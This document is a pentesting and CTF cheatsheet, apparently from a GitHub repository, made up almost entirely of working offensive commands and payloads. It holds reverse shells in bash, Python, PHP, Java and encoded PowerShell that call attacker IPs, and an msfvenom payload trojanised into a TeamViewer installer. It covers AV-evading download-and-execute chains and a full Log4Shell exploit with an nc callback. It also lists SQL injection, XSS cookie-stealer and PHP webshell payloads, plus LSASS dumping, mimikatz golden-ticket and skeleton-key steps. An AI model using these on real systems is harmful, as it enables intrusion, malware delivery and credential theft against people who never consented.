______ ____ ____ ____ _ _ ____ ____ ____ __ ____ / ||__ \|__ \|__ | |_ _\|\/_\|_ _\ | _\|___\| | | __\ /_ | _[ | _[ | / / || _><__ || | _\ | / | |__| ]_ \||___/|___/ /_/ |/ |/\_/ |/ |/ |/ |___/|___/ Version 1.0 Changes are welcome! GitHub: https://github.com/Leetcore/1337-observer This file is my cheatsheet for pentesting and CTFs. If you read with `less` type `-i` (ignore case) before searching. Type `/nc` to search. 🔥 HOT HOT HOT In this file: wordpress fastest cache (php), log4shell (java), printnightmare (windows), pwnkit (linux). # IP setup host=127.0.0.1 ping $host # change MAC address (mac change) openssl rand -hex 6 | sed 's/\(..\)/\1:/g; s/.$//' sudo ifconfig en0 ether # Kali terminal setup (podman, docker) apt install proxychains4 nmap sqlmap links neovim tor curl golang fish proxychains4 -q fish curl https://www.get-my-ip.info/api/ip # Micro editor setup apt install micro git bash-completion Config in ~/.config/micro/settings.json { "colorscheme": "dracula-tc", "lsp.autocompleteDetails": true, "lsp.ignoreMessages": "E501", "lsp.server": "python=pylsp" } # Helix editor setup flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo flatpak remote-add --if-not-exists --subset=verified flathub-verified https://flathub.org/repo/flathub.flatpakrepo flatpak install flathub com.helix_editor.Helix echo "alias hx='flatpak run com.helix_editor.Helix'" >> ~/.profile sudo snap install helix --classic # Editor language config apt install python3-pylsp cat ~/.config/helix/languages.toml [[language]] name = "python" [language-server.pylsp.config.pylsp.plugins] flake8 = {enabled = true} autopep8 = {enabled = true} mccabe = {enabled = true} pycodestyle = {enabled = true, ignore = ["E501"]} pyflakes = {enabled = true} pylint = {enabled = true} yapf = {enabled = true} ruff = { enabled = true} # ENCODING (encoding, enc) string to base64 echo -n "string" | base64 base64 to string echo -n "base64" | base64 -d string to hex echo -n "hex" | xxd -r -p # HASHES (hash, md5, sha256) Example Hash Inputs: 5f4dcc3b5aa765d61d8327deb882cf99 MD5 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 SHA1 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8 SHA256 $2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy BCRYPT $1$Pl3m5Y95$t3Nk4zEXTCXDP4Vs4cL0p0 MD5-Crypt If a hash has dollar signs “$” in it, this is usually a delimiter between the salt and the hash. Source: https://www.tunnelsup.com/hash-analyzer/ # leak search (leak, grep) Search big leaks in a zipped way (bash): zgrep -ia "@domain.de" BreachCompilation.tar.gz # grep emails grep -hioE '([a-z0-9\.\-]+@[a-z0-9\.\-]+)' file.csv # remove doublications (will sort the list) sort -u lines.txt awk '!a[$0]++' lines.txt # NETCAT (netcat, nc) Listening for shells (bash): nc -nvlp 1337 pip3 install pwncat-cs python3 -m pwncat :1337 # TOR setup (tor, vpn) You can actually use tor from "tor browser" with proxychains-ng: Config `proxychains.conf` by changing the last line from `socks4` to `socks5 127.0.0.1 9150`. Check working TOR with `proxychains4 curl https://www.get-my-ip.info/api/ip` # IMAP (imap, pop3, TSL) openssl s_client -connect 10.129.14.128:imaps # HASHCAT (hashcat) Crack bcrypt hashes: hashcat -m 3200 bcrypt.hash /usr/share/wordlists/rockyou.txt # MSFVENOM (msfvenom, msf, metasploit) Generate reverse shell exe (bash): msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx -o reverse_shell.aspx msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1338 -f exe -o /home/kali/rev.exe msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -o ./Lala.exe msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5 # Python webserver Host files (bash): python3 -m http.server 8080 zip -r all.zip * # Web Root (web root, default): Apache /var/www/html/ Nginx /usr/local/nginx/html/ IIS c:\inetpub\wwwroot\ XAMPP C:\xampp\htdocs\ # WinPeas in memory (windows, security tool) Download: https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat # LinPeas (linpeas, linux, priv) Download: wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh # HIDE FORM AV (anti virus, av, hide): ## open-ssl encryption openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc sudo python -m SimpleHTTPServer 80 #Start HTTP server curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim ## base64 encoded base64 -w0 linpeas.sh > lp.enc sudo python -m SimpleHTTPServer 80 #Start HTTP server curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim In Powershell: powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.18.11.136:8000/shell.exe','shell.exe')" IEX(New-Object Net.WebClient).DownloadString('http://...') # POWERSHELL (powershell, ps) Download reverse shell from source (cmd): powershell -c "Invoke-WebRequest -Uri 'http://10.8.10.59:8080/rev.exe' -OutFile 'c:\Windows\Temp\rev.exe'" powershell -c "Invoke-WebRequest -Uri 'http://10.8.10.59:8080/winPEAS.bat' -OutFile 'c:\Windows\Temp\lin.bat'" # POWERVIEW (powershell, powerview, ps) Download: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 powershell-import /opt/PowerSploit-dev/Recon/PowerView.ps1 Invoke-ShareFinder -CheckShareAccess net user NewUser MyPassword123! /add net localgroup Administrators /add NewUser When we provide the hostname, network authentication will attempt first to perform Kerberos authentication. Since Kerberos authentication uses hostnames embedded in the tickets, if we provide the IP instead, we can force the authentication type to be NTLM. net user /domain net user zoe.marshall /domain net group /domain net group "Tier 1 Admins" /domain net accounts /domain Get-ADGroupMember -Identity Administrators -Server za.tryhackme.com # EVIL WinRM Pass the hash (bash): evil-winrm -i spookysec.local -u administrator -H 0e0363213e37b94221497260b0bcb4fc # AD (ad, recon) net sessions net time net logons net share # John The Ripper (john, jtr, cracking hashes) Generate hash from files (bash): /path/other/xls2john excel.xls zip2john zipfile.zip Remove spaces and newlines (bash): echo -n "$hash$xyz" | cut -d "-" -f 1 > hash.txt john --wordlist=/usr/share/wordlists/rockyou.txt crack.hash # save root (ROOT) sudo chattr +i /root/flag.txt ps sudo kill -9 PID # Linux PwnKit (linux, policy kit, root) Source: https://github.com/ly4k/PwnKit Download: wget https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit Run in bash: sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)" # VMware Workspace One Source: https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC wget https://raw.githubusercontent.com/DrorDvash/CVE-2022-22954_VMware_PoC/main/CVE-2022-22954.py python3 CVE-2022-22954.py example.com "cat /etc/passwd" wget https://raw.githubusercontent.com/DrorDvash/CVE-2022-22954_VMware_PoC/main/CVE-2022-22954.py # Priv Escalation (priv esc): linpeas: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh Check sudo apps you can run: sudo -l Hijack path: which tar echo "/bin/bash" > tar echo $PATH export PATH=/tmp:$PATH # find suid binaries find / -perm -4000 2>/dev/null bash -p From user to root (Privilege Escalation) find / -perm +6000 2>/dev/null # Find files (find user files) find / -user username 2>/dev/null # Docker (priv, escalation, root) docker run -v /:/mnt --rm -it alpine chroot /mnt sh Read root files with error messages (unstable): command_you_can_run --var-in-there="/root/flag.txt" Core dumps: ulimit -S -c unlimited kill -11 pid cat /var/crash/... Proc: /proc/net/tcp /proc/sched_debug /proc/pid/cmdline # SAMBA (samba) enum4linux host searchsploit samba # SMB smbmap -H 10.10.10.3 # SMBCLIENT smbclient -N -L \\\\ip smbclient \\\\ip\\sharename # PHP rfi (rfi, smb, shell, webshell, php) impacket-smbserver -smb2support share $(pwd) /index.php?language=\\\shell.php&cmd=whoami # MINIMODEM Ascii to WAV: echo -n "string" | minimodem -t -f 1200.wav 1200 Wav to ascii: minimodem -r -f 1200.wav 1200 # NMAP (nmap, port) sudo nmap -sVC -sS host nmap -A --top-ports 1000 host Ping Scan: sudo nmap 10.10.1.1 -sn -PE --packet-trace -oA hosts --reason Windows: ttl=128 open|filtered = firewall / packet filter closed|filtered = firewall / packet filter SNMP example with script wildcards sudo nmap --script=snmp* -sU IP nmap -sV --script *vulners* --script-args mincvss=9 host Fast scanning a list of hosts: nmap --top-ports 100 --open -sV -T5 --script *vulners* --script-args mincvss=9 --stats-every 60s -iL domains.txt -oN nmap.txt Decoy scan (decoy): nmap -A ip -D RND:5 Firewall/IDS Tricks (fw, firewall, ids, port): sudo nmap 10.10.1.1 -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53 ncat -nv --source-port 53 10.10.1.1 50000 Nmap with searchsploit: nmap -sV -sC host -oX host.xml searchsploit --nmap host.xml # SEARCHSPLOIT searchsploit "searchword" searchsploit -m 123idofexploit searchsploit -x 123idofexploit # SQL Injection (SQLi, SQL, db) Auth bypass: admin'-- Check for SQLi: ' OR 1=1 Check columns if id and postgresql / mysql db:: id=1 order by 5 id=-1 union select 1,2,3,4 id=-1 union select 1,2,version(),4 id=-1 union select 1,2,user(),4 id=1 union all select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database() --+ id=1 union all select 1,,2,group_concat(column_name),4 from information_schema.columns where table_schema=database() and table_name='users'--+ id=1 union all select group_concat(id),group_concat(username),group_concat(password) from users where table_schema=database()--+ id=Gifts' union select 1,2,concat(username, ' ', password),4 from users --+ filter?category=Accessories' union all select table_name,NULL FROM information_schema.tables --%20 if query and where, dual for oracle db: filter?category=Accessories' union all select 'a','b' from dual--%20 filter?category=Accessories' union all select banner,'b' from v$version--%20 filter?category=Accessories' union all select column_name,null FROM USER_TAB_COLUMNS WHERE table_name = 'USERS_ZFQQIK' --%20 Blind SQL Injection: and 1=2 union select null from users where password like 'a%' --+ Check string output fields filter?category=Gifts' union select null,'a',null --+ Get banner: Oracle: SELECT banner FROM v$version SELECT: version FROM v$instance Microsoft: SELECT @@version PostgreSQL: SELECT version() MySQL: SELECT @@version In SQL: select '' INTO OUTFILE '/var/www/html/shell.php'; # POSTGRESS (postgress, postgressql) psql -h localhost -U postgres \c database \d (list) select * from users # SQLMAP Save full request with header and body in request.txt: sqlmap -R request.txt --batch --random-refer # nosql injection (SQL): username=admin&password[$ne]=admin filter?category=Gifts' || 'Pets {"username":{"$ne":""},"password":"peter"} {"username":{"$regex":"admin.*"},"password":{"$ne":""}} # RUBY template injection (ruby, ssti) ?message=<%= EXPRESSION %> # WPSCAN (wordpress, wpscan) enumerate plugins, themes etc wpscan --url http://domain -e vp,dbe,cb # wordpress wp fastest cache (wp, plugin) sqlmap --dbms=mysql -u "http://domain.com/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --banner --batch # SSH (port forwarding) ssh -L 3389:10.200.115.35:3389 -i id.key root@holo.live # SCP (scp, ssh, copy, file): scp /path/of/your/local/filename username@hostname:/path/to/remote/server/folder # upload (-l maxspeed) scp -l 1000000 file.zip root@127.0.0.1:/tmp # download (-l maxspeed) scp -l 1000000 root@127.0.0.1:/tmp . # REVERSE SHELLS (upgrade shell) Upgrade shell: python3 -c 'import pty; pty.spawn("/bin/bash")' optional: (inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; # REV SHELLS (rev shells) bash bash -c 'bash -i >& /dev/tcp// 0>&1' bash -i >& /dev/tcp/10.10.10.10/9001 0>&1 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|powershell -i 2>&1|nc 10.18.20.243 1337 >/tmp/f SH rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.177 1337 >/tmp/f rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7Csh+-i+2%3E%261%7Cnc+10.10.14.177+1337+%3E%2Ftmp%2Ff Python exec('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);') Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe PHP php -r '$sock=fsockopen("10.10.10.10",9001);exec("bash <&3 >&3 2>&3");' /dev/tcp/10.10.14.8/4444 0>&1'"); ?> JSP (jsp): <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ASP (asp): <% eval request("cmd") %> Powershell (powershell, ps): powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.10.10",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA== echo "$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()%" | base64 # TUNNELING (chisel, tunnel, ssh, internal) attacking machine: ./chisel server -p 8000 --reverse target machine: ./chisel client yourip:8000 R:socks sudo proxychains nmap -sVC -O 10.200.101.200/24 # LOCAL FILE INCLUSION (PHP) php://filter/convert.base64-encode/resource=/etc/passwd String host="192.18.28.2"; int port=4444; String cmd="bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); # Server side template injection (SSTI, express) Nunjucks/Express: In Javascript: {{range.constructor("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")()}} # GOBUSTER gobuster dir -u http://host/ -w /usr/share/wordlists/dirb/common.txt gobuster vhost -u http://host/ -w /usr/share/wordlists/dirb/big.txt | grep 200 # WFUZZ (fuzzing) --hh = hide response answer with charsize wfuzz --hh 455 -w /usr/share/seclists/Discovery/Web-Content/big.txt 'http://host/?view=FUZZ' ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://cozyhosting.htb/ -H "Host: FUZZ.cozyhosting.htb" -mc 200 # FFUF (ffuf, fuzz, web) ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.8.208/FUZZ # DOTDOTPWN (dotdotpwn, php, fuzzing) dotdotpwn -m http-url -u 'http://subdomain.domain.htb/index.php?page=TRAVERSAL' -k root # NIKTO nikto -host http://host/ # LOCAL FILE INCLUSION (lfi, php) Upload shell via Referer: curl 'http://host/notexist' -A "" # GraphQL (graphql) Try introspection {"query":"query { \n __schema \n{ \n types \n{ \n name, \n fields \n {\n name \n} \n} \n} \n}"} {"query":"query {\n getUserSession(email: \"lala\") \n{ \n email \n} \n}"} # MONGODB mongo show dbs use dbname db.dbname.find() # LOG4J (Log4Shell exploit, Java) Install and start LDAP server that redirects to your exploit class: https://github.com/mbechler/marshalsec apt install openjdk-21-jdk maven git clone https://github.com/mbechler/marshalsec.git mvn clean package -DskipTests java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://YOUR.IP:8000/#Exploit" Save exploit class to Exploit.java: Java file: public class Exploit { static { try { java.lang.Runtime.getRuntime().exec("nc -e /bin/bash YOUR.ATTACKER.IP 1337"); } catch (Exception e) { e.printStackTrace(); } } } Compile exploit to Javacode: javac Exploit.java --release 8 Host Javacode with python: python3 -m http.server Wait for reverse shell: nc -lnvp 1337 Trigger Log4J to connect with your LDAP: curl 'http://TARGET:8983/?foo=${jndi:ldap://YOUR.IP:1389/Exploit\}' Extract information from log4j: Just a string: ${jndi:${lower:l}${lower:d}a${lower:p}://xx.interactsh.com/poc} ${jndi:${lower:l}${lower:d}a${lower:p}://${hostName}.${sys:java.version}.xx.interactsh.com/poc} # ENUM4LINUX enum4linux 10.10.82.233 # NFS (nfs, network share, linux) showmount -e 10.129.57.246 mkdir nfsmount mount -t nfs 10.129.57.246:/ ./nfsmount/ -o nolock # dig (enum, dns, ns, nameserver, zone transfer) dig any @$host support.htb dig axfr internal.inlanefreight.htb @10.129.216.3 dig axfr @10.10.11.174 dig axfr @10.10.11.174 domain # DNS RECON (enum, recon, brute force, dns) dnsrecon -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -d domain.htb -t brt msfconsole: search enum_dns set DOMAIN support.htb set NS DNS_IP run # HYDRA (hydra, forms, post, data) hydra -L usernames.txt -P passwords.txt ssh://10.10.83.180:22 -I hydra -L usernames.txt -P passwords.txt imap://10.10.83.180:143 -I hydra -L usernames.txt -P passwords.txt pop3://10.10.83.180:110 -I hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.60.202 http-post-form '/login:username=^USER^&password=^PASS^:F=/login' -I # METASPLOIT (metasploit, msfconsole) Basic msfconsole: search php use 2 show options set RHOSTS 1.1.1.1 set RPORT 22 set LHOST tun0 set LPORT 1337 run -j # METASPLOIT (metasploit, windows, token) load incognito list_tokens -g impersonate_token "BUILTIN\Administrators" getuid ps (find services.exe PID) migrate 668 (services.exe PID) Database: sudo msfdb run hosts -d (delete hosts) db_nmap -A --top-ports 1000 10.129.203.65 setg RHOSTS 10.129.203.65 (set global) use post/multi/recon/local_exploit_suggester upgrade shell to meterpreter: sessions -u -1 resolve webservice_database route add 172.28.101.51/32 -1 run srvhost=127.0.0.1 srvport=9050 version=4a proxychains nmap 172.28.101.51 hashdump load kiwi lsa_dump_sam lsa_dump_secrets Custom: loadpath /usr/share/metasploit-framework/modules/ reload_all Meterpreter (multi/handler, reverse shell): use multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST tun0 set LPORt 1337 run -j Portscan in msfconsole: auxiliary(scanner/portscan/tcp) set RHOSTS 10.200.115.0/24 set THREADS 5 run -j # OpenVAS (openvas, kali) sudo apt install gvm sudo gvm-check-setup # WINDOWS (windows) # printnightmare (PN, print, spool): Source: https://github.com/calebstewart/CVE-2021-1675.git Download: wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 In Powershell: Import-Module .\cve-2021-1675.ps1 Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default # Windows Exploit Download: https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git shell systeminfo > win10-systeminfo.txt ./windows-exploit-suggester.py --update ./windows-exploit-suggester.py --database 2021-03-09-mssb.xls --systeminfo win10-systeminfo.txt # kerbrute (ad, brute force, pw) Quelle: https://github.com/ropnop/KERBRUTE Download: go get github.com/ropnop/kerbrute In Go binfolder: ./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt # RUBEUS (rubeus) Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt # Impacket (windows) Source: https://github.com/SecureAuthCorp/impacket Download: git clone https://github.com/SecureAuthCorp/impacket.git Scripts are in /examples: python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip MACHINE_IP -request # POWERVIEW Source: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 Download: wget https://gist.githubusercontent.com/HarmJ0y/184f9822b195c52dd50c379ed3117993/raw/e5e30c942adb2347917563ef0dafa7054882535a/PowerView-3.0-tricks.ps1 In Powershell: Get-NetUser | select cn Get-NetGroup -GroupName *admin* If we have PRIVILEGED rights, with "hashdump" and "logonpasswords" we can get the hashes and the passwords. This is a fast way to get passwords, but it may not work. For example the AV will interfere. A better way to do it is this: - Do ps and find the LSASS.exe process (It stores our passwords).Remember the PID. - Make its dump. Go to beacon: - cd Windows - shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\Users\User1\lsass.dmp full - In PID parameter specify PID number of LSASS.exe - You can use any writeable directory, for example: C:\Users\User1\lsass.dmp Analogue of: - execute-assembly /opt/cobalt_strike_extension_kit/exe/SharpDump.exe When you make the dump, download it. Once downloaded, open mimikatz on your machine and run the following commands. (Put lsass.dmp in the folder with mimikatz) sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords # MIMIKATZ In mimikatz: privilege::debug = 20? token:elevate lsadump::sam john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT thomas.hash john hashes.txt -wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 john --incremental:Lower --incremental:Alpha --incremental:Digits (10 char) --incremental:Alnum john --mask=?1?1?1?1?1?1?1?1 -1=[A-Z] wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/doc/MASK crunch 1 6 abcdefg Export ticket: sekurlsa::tickets /export Pass the ticket: In mimikatz: kerberos::ptt Check in CMD: exit klist dir \\ip\admin$ Golden/silver ticket: In mimikatz: lsadump::lsa /patch lsadump::lsa /inject /name:krbtgt Kerberos::golden /user:Administrator /domain:controller.local /sid:$SID /krbtgt:$NTLM /id:$USERID Golden/silver ticket to access other machines: Check in mimikatz: misc::cmd Skeleton key (every User-PW: mimikatz): In mimikatz: misc::skeleton # LOOTING (loot, chrome) grep -rl 'password' / 2> /dev/null https://github.com/djhohnstein/SharpChromium SharpChrome.exe logins /showall .git config (GIT, git, loot) git log -Susername . git log -Spassword . # RADARE2 (r2, radare) aaa (analyze) afl (analyze functions) pd (print) pd1 (print 1) pdf @main (print function) s entry0 VV @main (visalize function) # XSS (xss) html "'> "';<" ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; '';!--"=&{()} %22%27%3E%3C%68%31%3E%78%73%73%3C%2F%68%31%3E "'><h1>xss</h1> "'><h1>xss</h1> # COOKIE STEALER new Image().src='http://OUR_IP/index.php?c='+document.cookie "'> # PHP Local File Inclusion (php, filter, lfi) index.php?param=php://filter/convert.base64-encode/resource=index curl http://10.10.11.154/index.php?page=php://filter/convert.base64-encode/resource=index.php | base64 -d # PHP RCE (php, rce, base64) http://68.183.35.90:30015/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat%20/etc/passwd data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat /37809e2f8952f06139011994726d9ef1.txt # XXE (XML external entities): In XML: ]>